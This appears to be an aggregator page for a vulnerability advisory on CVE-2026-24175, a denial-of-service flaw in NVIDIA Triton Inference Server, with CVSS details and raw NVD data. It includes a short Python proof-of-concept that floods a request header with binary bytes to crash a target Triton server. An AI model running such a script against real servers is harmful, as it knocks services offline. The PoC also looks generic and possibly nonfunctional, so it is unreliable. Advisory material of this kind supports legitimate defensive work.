Security Vulnerability Report
中文
CVE-2026-24175 CVSS 7.5 HIGH

CVE-2026-24175

Published: 2026-04-07 18:16:40
Last Modified: 2026-04-16 16:57:55

Description

NVIDIA Triton Inference Server contains a vulnerability where an attacker could cause a server crash by sending a malformed request header to the server. A successful exploit of this vulnerability might lead to denial of service.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:nvidia:triton_inference_server:*:*:*:*:*:*:*:* - VULNERABLE
NVIDIA Triton Inference Server (具体受影响版本请参考NVIDIA官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit(target_url): # Construct a malformed header that triggers the crash headers = { 'User-Agent': 'Mozilla/5.0', 'X-Malformed-Header': '\x00\x01\x02\x03\x04' * 100 # Repetitive binary data } try: # Sending the request without verification for simplicity response = requests.get(target_url, headers=headers, timeout=5, verify=False) print(f"Request sent, status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"Request failed (Server might have crashed): {e}") if __name__ == "__main__": url = "http://target-triton-server:8000" exploit(url)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24175", "sourceIdentifier": "[email protected]", "published": "2026-04-07T18:16:40.067", "lastModified": "2026-04-16T16:57:54.740", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NVIDIA Triton Inference Server contains a vulnerability where an attacker could cause a server crash by sending a malformed request header to the server. A successful exploit of this vulnerability might lead to denial of service."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-248"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nvidia:triton_inference_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.02", "matchCriteriaId": "D065C964-D751-4288-96A0-0E0E87AF886A"}]}]}], "references": [{"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24175", "source": "[email protected]", "tags": ["US Government Resource"]}, {"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5816", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cve.org/CVERecord?id=CVE-2026-24175", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}